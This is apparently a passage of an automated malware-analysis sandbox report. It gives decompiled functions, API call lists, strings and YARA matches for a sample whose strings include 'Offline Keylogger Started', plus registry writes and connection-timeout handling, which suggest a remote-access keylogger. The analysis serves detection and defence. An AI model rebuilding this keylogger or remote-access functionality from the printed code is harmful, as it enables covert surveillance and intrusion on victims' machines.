                                              • Part of subcall function 013B5DD3: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,]), ref: 013B5E2D
                                              • Part of subcall function 013B5DD3: malloc.MSVCRT ref: 013B5E37
                                              • Part of subcall function 013B5DD3: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,013B51C6,?,?,?,?,]), ref: 013B5E61
                                              • Part of subcall function 013B5DD3: sprintf.MSVCRT ref: 013B5E69
                                              • Part of subcall function 013B5DD3: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00000000), ref: 013B5E7C
                                              • Part of subcall function 013B5DD3: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00000000), ref: 013B5E8C
                                              • Part of subcall function 013B5DD3: SetEvent.KERNEL32(00000000), ref: 013B5E95
                                              • Part of subcall function 013B5DD3: free.MSVCRT(00000000), ref: 013B5E9C
                                              • Part of subcall function 013B5DD3: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 013B5EA6
                                            • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(Offline Keylogger Started,?,?,?,?,013B95B7,?,?,?,?,?,?,?,?,00000000,00000011), ref: 013B51D0
                                            • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([INFO],?), ref: 013B51E4
                                            • CreateThread.KERNELBASE(00000000,00000000,013B528A,013CB900,00000000,00000000), ref: 013B5204
                                            • CreateThread.KERNELBASE(00000000,00000000,013B526A,013CB900,00000000,00000000), ref: 013B5214
                                            • CreateThread.KERNELBASE(00000000,00000000,013B5299,013CB900,00000000,00000000), ref: 013B5220
                                            • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 013B5225
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.611727246.00000000013B0000.00000040.00000001.sdmp, Offset: 013B0000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$??1?$basic_string@V01@$??0?$basic_string@CreateD@1@@Thread$??4?$basic_string@D@2@@0@G@2@@std@@G@std@@Hstd@@V01@@V?$basic_string@Y?$basic_string@$?c_str@?$basic_string@?length@?$basic_string@EventKeyboardLayoutLocalTimeV10@V10@@freemallocsprintf
                                            • String ID: Offline Keylogger Started$[INFO]
                                            • API String ID: 2375278975-3749928830
                                            • Opcode ID: b924c89fcf6ab65ad7f52b100ec196aea08d64bd78c135dbf43fcb18b5f9a51d
                                            • Instruction ID: 12eece2838708a138d0a1620dd2a7048ab57e6c47a72961545a24e0ae9d67d5f
                                            • Opcode Fuzzy Hash: b924c89fcf6ab65ad7f52b100ec196aea08d64bd78c135dbf43fcb18b5f9a51d
                                            • Instruction Fuzzy Hash: 9611B2716022247FD7256A6ADC8DDEF3F6CEF466A4B400058F80686245EBB57A09CBF1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 013B2580, Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 66timethreadCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 37%
                                            			E013B2580(void* __ecx, intOrPtr _a4, intOrPtr _a8, char _a11) {
				struct _SYSTEMTIME _v20;
				char _v36;
				void* _v52;
				char* _t25;
				char* _t26;
				intOrPtr _t35;
				void* _t37;

				_t37 = __ecx;
				if( *((intOrPtr*)(__ecx + 0x38)) != 0) {
					__eflags = 0;
					return 0;
				}
				_t35 = _a4;
				if(_a8 != 0) {
					__eflags =  *0x13cbcac; // 0x0
					if(__eflags != 0) {
						GetLocalTime( &_v20);
						_t25 =  &_a11;
						__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z("%02i:%02i:%02i:%03i [INFO] ", _t25, "KeepAlive Enabled! Timeout: %i seconds\n", _v20.wHour & 0x0000ffff, _v20.wMinute & 0x0000ffff, _v20.wSecond & 0x0000ffff, _v20.wMilliseconds & 0x0000ffff, _t35);
						_t26 =  &_v36;
						L013C4170();
						__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ(_t26, _t25);
						printf(_t26);
						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
					}
				} else {
					 *((char*)(__ecx + 0x44)) = 1;
				}
				 *((char*)(_t37 + 0x38)) = 1;
				 *((intOrPtr*)(_t37 + 0x3c)) = _t35;
				CreateThread(0, 0, E013B27A2, _t37, 0, 0); // executed
				return 1;
			}










                                            0x013b2588
                                            0x013b258f
                                            0x013b262f
                                            0x00000000
                                            0x013b262f
                                            0x013b2599
                                            0x013b259c
                                            0x013b25a4
                                            0x013b25aa
                                            0x013b25b0
                                            0x013b25ce
                                            0x013b25dc
                                            0x013b25e3
                                            0x013b25e7
                                            0x013b25f1
                                            0x013b25f8
                                            0x013b2604
                                            0x013b260d
                                            0x013b260d
                                            0x013b259e
                                            0x013b259e
                                            0x013b259e
                                            0x013b261d
                                            0x013b2621
                                            0x013b2624
                                            0x00000000

                                            APIs
                                            • GetLocalTime.KERNEL32(?,00000001,013CBE70,013CB310,?,?,?,?,?,?,?,?,?,013BCAF3,0000000A,00000000), ref: 013B25B0
                                            • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(%02i:%02i:%02i:%03i [INFO] ,?,KeepAlive Enabled! Timeout: %i seconds,0000000A,?,00000000,?,0000000A), ref: 013B25DC
                                            • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,013BCAF3,0000000A,00000000), ref: 013B25E7
                                            • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,013BCAF3,0000000A,00000000), ref: 013B25F1
                                            • printf.MSVCRT ref: 013B25F8
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 013B2604
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 013B260D
                                            • CreateThread.KERNELBASE(00000000,00000000,013B27A2,013CBE70,00000000,00000000), ref: 013B2624
                                            Strings
                                            • KeepAlive Enabled! Timeout: %i seconds, xrefs: 013B25D1
                                            • %02i:%02i:%02i:%03i [INFO] , xrefs: 013B25D7
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.611727246.00000000013B0000.00000040.00000001.sdmp, Offset: 013B0000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@?c_str@?$basic_string@CreateD@1@@D@2@@0@Hstd@@LocalThreadTimeV10@V?$basic_string@printf
                                            • String ID: %02i:%02i:%02i:%03i [INFO] $KeepAlive Enabled! Timeout: %i seconds
                                            • API String ID: 3715082883-586133315
                                            • Opcode ID: f47a6ac436a31490e3214ec9ce7562928d9f25685a9d1dd2cc26ee5c3d290872
                                            • Instruction ID: 1ef3e10d28666729d785f96aecbe135a478fa251f89005fb7cb89735a510282f
                                            • Opcode Fuzzy Hash: f47a6ac436a31490e3214ec9ce7562928d9f25685a9d1dd2cc26ee5c3d290872
                                            • Instruction Fuzzy Hash: D7119372A00258BFCB21DBE5DC89DFFBBBCAB55719F00401AF94292541EAB5B944CB70
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 013B27B1, Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 62sleeptimeCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 44%
                                            			E013B27B1(void* __ecx) {
				char _v5;
				struct _SYSTEMTIME _v24;
				char _v40;
				void* _v56;
				char* _t29;
				char* _t30;
				void* _t38;
				intOrPtr _t46;

				_t38 = __ecx;
				 *((intOrPtr*)(__ecx + 0x40)) = 0;
				if( *((intOrPtr*)(__ecx + 0x3c)) <= 0) {
					L3:
					if( *((intOrPtr*)(_t38 + 0x39)) == 0) {
						_t46 =  *0x13cbcac; // 0x0
						if(_t46 != 0) {
							GetLocalTime( &_v24);
							_t29 =  &_v5;
							__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z("%02i:%02i:%02i:%03i [WARNING] ", _t29, "Timeout expired, resetting connection.\n", _v24.wHour & 0x0000ffff, _v24.wMinute & 0x0000ffff, _v24.wSecond & 0x0000ffff, _v24.wMilliseconds & 0x0000ffff);
							_t30 =  &_v40;
							L013C4170();
							__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ(_t30, _t29);
							_t21 = printf(_t30);
							__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
							__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
						}
						E013B20F4(_t21, _t38);
					}
					L7:
					 *((char*)(_t38 + 0x38)) = 0;
					 *((char*)(_t38 + 0x39)) = 0;
					return 0;
				}
				while( *((intOrPtr*)(_t38 + 0x39)) == 0) {
					Sleep(0x3e8); // executed
					 *(_t38 + 0x40) =  *(_t38 + 0x40) + 1;
					_t21 =  *(_t38 + 0x40);
					if( *(_t38 + 0x40) <  *((intOrPtr*)(_t38 + 0x3c))) {
						continue;
					}
					goto L3;
				}
				goto L7;
			}











                                            0x013b27b9
                                            0x013b27c0
                                            0x013b27c3
                                            0x013b27e4
                                            0x013b27e7
                                            0x013b27e9
                                            0x013b27ef
                                            0x013b27f5
                                            0x013b2812
                                            0x013b2820
                                            0x013b2827
                                            0x013b282b
                                            0x013b2835
                                            0x013b283c
                                            0x013b2848
                                            0x013b2851
                                            0x013b2851
                                            0x013b2859
                                            0x013b2859
                                            0x013b285e
                                            0x013b285e
                                            0x013b2861
                                            0x013b2869
                                            0x013b2869
                                            0x013b27c5
                                            0x013b27d3
                                            0x013b27d9
                                            0x013b27dc
                                            0x013b27e2
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x013b27e2
                                            0x00000000

                                            APIs
                                            • Sleep.KERNELBASE(000003E8), ref: 013B27D3
                                            • GetLocalTime.KERNEL32(?), ref: 013B27F5
                                            • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(%02i:%02i:%02i:%03i [WARNING] ,?,Timeout expired, resetting connection.,?,?,?,?), ref: 013B2820
                                            • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 013B282B
                                            • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 013B2835
                                            • printf.MSVCRT ref: 013B283C
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 013B2848
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 013B2851
                                            Strings
                                            • %02i:%02i:%02i:%03i [WARNING] , xrefs: 013B281B
                                            • Timeout expired, resetting connection., xrefs: 013B2815
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.611727246.00000000013B0000.00000040.00000001.sdmp, Offset: 013B0000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@?c_str@?$basic_string@D@1@@D@2@@0@Hstd@@LocalSleepTimeV10@V?$basic_string@printf
                                            • String ID: %02i:%02i:%02i:%03i [WARNING] $Timeout expired, resetting connection.
                                            • API String ID: 2756237499-4159561219
                                            • Opcode ID: 99c6586ab1341c8803d25260d418e868a1e7b0a907e5279629cf56ebe7c48ba5
                                            • Instruction ID: feadf66e651f64ef97f57d72f1c46dffa95663a533bb231e537567e54a8275f3
                                            • Opcode Fuzzy Hash: 99c6586ab1341c8803d25260d418e868a1e7b0a907e5279629cf56ebe7c48ba5
                                            • Instruction Fuzzy Hash: BF118471A00344AFCB21DBA8D9858EFBBBDBB18705B40055EF642E2941EB71B944CB65
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 013C3FA4, Relevance: 16.6, APIs: 11, Instructions: 111COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 79%
                                            			_entry_(void* __ebx, void* __edi, void* __esi) {
				CHAR* _v8;
				intOrPtr* _v24;
				intOrPtr _v28;
				struct _STARTUPINFOA _v96;
				int _v100;
				char** _v104;
				int _v108;
				void _v112;
				char** _v116;
				intOrPtr* _v120;
				intOrPtr _v124;
				intOrPtr* _t24;
				void* _t27;
				intOrPtr _t36;
				signed int _t38;
				int _t40;
				intOrPtr* _t41;
				intOrPtr _t42;
				intOrPtr _t49;
				intOrPtr* _t54;
				intOrPtr _t57;
				intOrPtr _t60;

				_push(0xffffffff);
				_push(0x13c6e50);
				_push(0x13c4130);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t57;
				_v28 = _t57 - 0x68;
				_v8 = 0;
				__set_app_type(2);
				 *0x13cc26c =  *0x13cc26c | 0xffffffff;
				 *0x13cc270 =  *0x13cc270 | 0xffffffff;
				 *(__p__fmode()) =  *0x13cc264;
				_t24 = __p__commode();
				_t47 =  *0x13cc260;
				 *_t24 =  *0x13cc260;
				 *0x13cc268 = _adjust_fdiv;
				_t27 = E013B4F3A( *_adjust_fdiv);
				_t60 =  *0x13cb190; // 0x1
				if(_t60 == 0) {
					__setusermatherr(E013C412C);
					_pop(_t47);
				}
				E013C411A(_t27);
				_push(0x13cb0e8);
				_push(0x13cb0e4);
				L013C4114();
				_v112 =  *0x13cc25c;
				__getmainargs( &_v100,  &_v116,  &_v104,  *0x13cc258,  &_v112);
				_push(0x13cb0e0);
				_push(0x13cb000); // executed
				L013C4114(); // executed
				_t54 =  *_acmdln;
				_v120 = _t54;
				if( *_t54 != 0x22) {
					while(1) {
						__eflags =  *_t54 - 0x20;
						if(__eflags <= 0) {
							goto L7;
						}
						_t54 = _t54 + 1;
						_v120 = _t54;
					}
				} else {
					do {
						_t54 = _t54 + 1;
						_v120 = _t54;
						_t42 =  *_t54;
					} while (_t42 != 0 && _t42 != 0x22);
					if( *_t54 == 0x22) {
						L6:
						_t54 = _t54 + 1;
						_v120 = _t54;
					}
				}
				L7:
				_t36 =  *_t54;
				if(_t36 != 0 && _t36 <= 0x20) {
					goto L6;
				}
				_v96.dwFlags = 0;
				GetStartupInfoA( &_v96);
				_t68 = _v96.dwFlags & 0x00000001;
				if((_v96.dwFlags & 0x00000001) == 0) {
					_t38 = 0xa;
				} else {
					_t38 = _v96.wShowWindow & 0x0000ffff;
				}
				_t40 = E013B8C98(_t47, _t68, GetModuleHandleA(0), 0, _t54, _t38); // executed
				_v108 = _t40;
				exit(_t40);
				_t41 = _v24;
				_t49 =  *((intOrPtr*)( *_t41));
				_v124 = _t49;
				_push(_t41);
				_push(_t49);
				L013C410E();
				return _t41;
			}

























                                            0x013c3fa7
                                            0x013c3fa9
                                            0x013c3fae
                                            0x013c3fb9
                                            0x013c3fba
                                            0x013c3fc7
                                            0x013c3fcc
                                            0x013c3fd1
                                            0x013c3fd8
                                            0x013c3fdf
                                            0x013c3ff2
                                            0x013c3ff4
                                            0x013c3ffa
                                            0x013c4000
                                            0x013c4009
                                            0x013c400e
                                            0x013c4013
                                            0x013c4019
                                            0x013c4020
                                            0x013c4026
                                            0x013c4026
                                            0x013c4027
                                            0x013c402c
                                            0x013c4031
                                            0x013c4036
                                            0x013c4040
                                            0x013c4059
                                            0x013c405f
                                            0x013c4064
                                            0x013c4069
                                            0x013c4076
                                            0x013c4078
                                            0x013c407e
                                            0x013c40ba
                                            0x013c40ba
                                            0x013c40bd
                                            0x00000000
                                            0x00000000
                                            0x013c40bf
                                            0x013c40c0
                                            0x013c40c0
                                            0x013c4080
                                            0x013c4080
                                            0x013c4080
                                            0x013c4081
                                            0x013c4084
                                            0x013c4086
                                            0x013c4091
                                            0x013c4093
                                            0x013c4093
                                            0x013c4094
                                            0x013c4094
                                            0x013c4091
                                            0x013c4097
                                            0x013c4097
                                            0x013c409b
                                            0x00000000
                                            0x00000000
                                            0x013c40a1
                                            0x013c40a8
                                            0x013c40ae
                                            0x013c40b2
                                            0x013c40c7
                                            0x013c40b4
                                            0x013c40b4
                                            0x013c40b4
                                            0x013c40d3
                                            0x013c40d8
                                            0x013c40dc
                                            0x013c40e2
                                            0x013c40e7
                                            0x013c40e9
                                            0x013c40ec
                                            0x013c40ed
                                            0x013c40ee
                                            0x013c40f5

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.611727246.00000000013B0000.00000040.00000001.sdmp, Offset: 013B0000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__p__commode__p__fmode__set_app_type__setusermatherrexit
                                            • String ID:
                                            • API String ID: 801014965-0
                                            • Opcode ID: ee44ddc866cf41d386f1ac273cf812dc6307b7c85119e0ceb29c8509b79de65f
                                            • Instruction ID: 631d1bb97c593d93ed12b5f2864adfcfc6ac2772f1eb98562cdf199c6566e972
                                            • Opcode Fuzzy Hash: ee44ddc866cf41d386f1ac273cf812dc6307b7c85119e0ceb29c8509b79de65f
                                            • Instruction Fuzzy Hash: 7341BDB1E40358AFDB30DFA9D899AA9BBBCFB09B15F20011EE59697245D7B06C40CF50
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 013B9823, Relevance: 12.1, APIs: 8, Instructions: 81COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 53%
                                            			E013B9823(intOrPtr _a4) {
				unsigned int _v8;
				signed char* _v12;
				char _v13;
				void* _v20;
				void* _v24;
				char _v40;
				void* _v56;
				char _v1080;
				void* _t36;
				signed int _t38;
				signed int _t42;
				int _t51;
				signed int _t54;
				signed int _t55;
				signed int _t66;
				signed char* _t76;
				void* _t83;
				void* _t88;
				void* _t89;

				_v12 = _v12 & 0x00000000;
				_v8 = E013B9D02( &_v12);
				_t51 =  *_v12 & 0x000000ff;
				_t36 = malloc(_t51);
				_t76 = _v12;
				_t54 = _t51;
				_t7 = _t76 + 1; // 0x1
				_t88 = _t7;
				_v24 = _t36;
				_t55 = _t54 >> 2;
				memcpy(_t36, _t88, _t55 << 2);
				_t38 = memcpy(_t88 + _t55 + _t55, _t88, _t54 & 0x00000003);
				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z(_t38, _t51,  &_v13);
				__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z(_t38);
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				_v8 = _v8 + (_t38 | 0xffffffff) - _t51;
				_t83 = malloc(_v8);
				_t42 = _v12;
				_v20 = _t83;
				_t20 = _t42 + 1; // 0x1
				_t89 = _t51 + _t20;
				_t66 = _v8 >> 2;
				memcpy(_t89 + _t66 + _t66, _t89, memcpy(_t83, _t89, _t66 << 2) & 0x00000003);
				E013B2F9B( &_v1080, _v24, _t51);
				E013B309E( &_v1080,  &_v40, _v20, _v8); // executed
				free(_v20);
				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z( &_v40);
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				return _a4;
			}






















                                            0x013b982c
                                            0x013b983c
                                            0x013b9842
                                            0x013b9846
                                            0x013b984c
                                            0x013b9853
                                            0x013b9855
                                            0x013b9855
                                            0x013b985a
                                            0x013b985d
                                            0x013b9860
                                            0x013b9867
                                            0x013b9872
                                            0x013b987e
                                            0x013b9887
                                            0x013b9892
                                            0x013b989e
                                            0x013b98a0
                                            0x013b98a4
                                            0x013b98aa
                                            0x013b98aa
                                            0x013b98b1
                                            0x013b98be
                                            0x013b98c6
                                            0x013b98db
                                            0x013b98e3
                                            0x013b98f1
                                            0x013b98fa
                                            0x013b9907

                                            APIs
                                              • Part of subcall function 013B9D02: FindResourceA.KERNEL32(00000000,SETTINGS,0000000A), ref: 013B9D10
                                              • Part of subcall function 013B9D02: LoadResource.KERNEL32(00000000,00000000,?,?,?,013B983C,00000000,?,?,00000000), ref: 013B9D1B
                                              • Part of subcall function 013B9D02: LockResource.KERNEL32(00000000,?,?,?,013B983C,00000000,?,?,00000000), ref: 013B9D22
                                              • Part of subcall function 013B9D02: SizeofResource.KERNEL32(00000000,00000000,?,?,?,013B983C,00000000,?,?,00000000), ref: 013B9D2D
                                            • malloc.MSVCRT ref: 013B9846
                                            • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(00000000,00000000,?,00000000), ref: 013B9872
                                            • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 013B987E
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 013B9887
                                            • malloc.MSVCRT ref: 013B9898
                                              • Part of subcall function 013B309E: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,?,?,00000001,?,?,00000000,013B8CAD,00000000), ref: 013B30B4
                                              • Part of subcall function 013B309E: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?), ref: 013B30C0
                                              • Part of subcall function 013B309E: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,00000000), ref: 013B30D5
                                              • Part of subcall function 013B309E: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 013B30DE
                                            • free.MSVCRT(?,?,?,00000000,013B8CAD,00000000), ref: 013B98E3
                                            • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 013B98F1
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 013B98FA
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.611727246.00000000013B0000.00000040.00000001.sdmp, Offset: 013B0000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$??0?$basic_string@Resource$??1?$basic_string@V01@@$D@1@@malloc$??4?$basic_string@?c_str@?$basic_string@FindLoadLockSizeofV01@free
                                            • String ID:
                                            • API String ID: 531887698-0
                                            • Opcode ID: f8d426f04baf14a6c7677f85958ebb81c0c04058732f8f20cda0ea3f34599550
                                            • Instruction ID: f05a1d78d0628bd8131d35493d7f17f85123414e7cff40d277faae2c80396d69
                                            • Opcode Fuzzy Hash: f8d426f04baf14a6c7677f85958ebb81c0c04058732f8f20cda0ea3f34599550
                                            • Instruction Fuzzy Hash: EC312A71A00109AFCF14DFA4E9999EEBBB9FF58315F100169EA06A3290DB70BF05CB50
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 013BB708, Relevance: 10.5, APIs: 7, Instructions: 41registryCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 28%
                                            			E013BB708(void* _a4, void* _a8, char* _a12, void* _a16, int _a32) {
				char* _t13;
				long _t15;
				void* _t18;
				int _t19;
				void* _t25;

				_t13 = RegCreateKeyA(_a4, _a8,  &_a8); // executed
				if(_t13 != 0) {
					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
					return 0;
				} else {
					__imp__?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ(_t25, _t18);
					__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
					_t19 = 0;
					_t15 = RegSetValueExA(_a8, _a12, 0, _a32, _t13, _t13); // executed
					RegCloseKey(_a8);
					if(_t15 == 0) {
						_t19 = 1;
					}
					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
					return _t19;
				}
			}








                                            0x013bb715
                                            0x013bb71d
                                            0x013bb76a
                                            0x013bb773
                                            0x013bb71f
                                            0x013bb724
                                            0x013bb72e
                                            0x013bb735
                                            0x013bb741
                                            0x013bb74c
                                            0x013bb754
                                            0x013bb756
                                            0x013bb756
                                            0x013bb75b
                                            0x013bb766
                                            0x013bb766

                                            APIs
                                            • RegCreateKeyA.ADVAPI32(?,?,?), ref: 013BB715
                                            • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(013CBCB0,00000000,?,013BB948,?,?,?,?,?,?,00000000), ref: 013BB724
                                            • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,013BB948,?,?,?,?,?,?,00000000), ref: 013BB72E
                                            • RegSetValueExA.KERNELBASE(?,013BB948,00000000,?,00000000,?,013BB948,?,?,?,?,?,?,00000000), ref: 013BB741
                                            • RegCloseKey.ADVAPI32(?,?,013BB948,?,?,?,?,?,?,00000000), ref: 013BB74C
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,013BB948,?,?,?,?,?,?,00000000), ref: 013BB75B
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,013BB948,?,?,?,?,?,?,00000000), ref: 013BB76A
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.611727246.00000000013B0000.00000040.00000001.sdmp, Offset: 013B0000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??1?$basic_string@$?c_str@?$basic_string@?size@?$basic_string@CloseCreateValue
                                            • String ID:
                                            • API String ID: 2159132150-0
                                            • Opcode ID: e1f5e9283e12616bf70547f38a9d63498b0e0daf1b6b79411e86c629d9dfa4a1
                                            • Instruction ID: 60575d438e636f17f05a01755154a20d6d3fd55c03521d29c56e198222d43f91
                                            • Opcode Fuzzy Hash: e1f5e9283e12616bf70547f38a9d63498b0e0daf1b6b79411e86c629d9dfa4a1
                                            • Instruction Fuzzy Hash: 9901A472140119AFCF11AFA0ED998EE7B6DFF18356B008125FE1AD6064EB31AD24DB60
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 013B5532, Relevance: 9.1, APIs: 6, Instructions: 59sleepfileCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 59%
                                            			E013B5532(void* __ecx) {
				signed int _t8;
				WCHAR* _t9;
				long _t12;
				void* _t21;
				void* _t22;
				void* _t28;

				_t8 =  *0x13cb988; // 0x989680
				_t9 = _t8 |  *0x13cb98c;
				_t22 = __ecx;
				if(_t9 != 0) {
					 *((char*)(__ecx + 0x30)) = 0;
					do {
						__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
						_t9 = CreateFileW(_t9, 0x80000000, 7, 0, 3, 0x80, 0); // executed
						_t21 = _t9;
						if(_t21 == 0xffffffff) {
							 *((char*)(_t22 + 0x30)) = 0;
						} else {
							_t12 = GetFileSize(_t21, 0);
							_t28 = 0 -  *0x13cb98c; // 0x0
							if(_t28 >= 0 && (_t28 > 0 || _t12 >=  *0x13cb988)) {
								 *((char*)(_t22 + 0x30)) = 1;
								if( *((intOrPtr*)(_t22 + 0x3c)) != 0) {
									E013B5D50(_t22);
								}
								Sleep(0x2710);
							}
							_t9 = FindCloseChangeNotification(_t21); // executed
						}
					} while ( *((char*)(_t22 + 0x30)) == 1);
					if( *((intOrPtr*)(_t22 + 0x3c)) == 0 &&  *0x13cb154 == 0x31) {
						__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z(_t22 + 0x54);
						return E013B5180(_t22);
					}
				}
				return _t9;
			}









                                            0x013b5532
                                            0x013b5538
                                            0x013b5540
                                            0x013b5542
                                            0x013b554a
                                            0x013b554d
                                            0x013b5562
                                            0x013b5569
                                            0x013b556f
                                            0x013b5574
                                            0x013b55b6
                                            0x013b5576
                                            0x013b5578
                                            0x013b5580
                                            0x013b5586
                                            0x013b5595
                                            0x013b5599
                                            0x013b559d
                                            0x013b559d
                                            0x013b55a7
                                            0x013b55a7
                                            0x013b55ae
                                            0x013b55ae
                                            0x013b55b9
                                            0x013b55c2
                                            0x013b55d6
                                            0x00000000
                                            0x013b55de
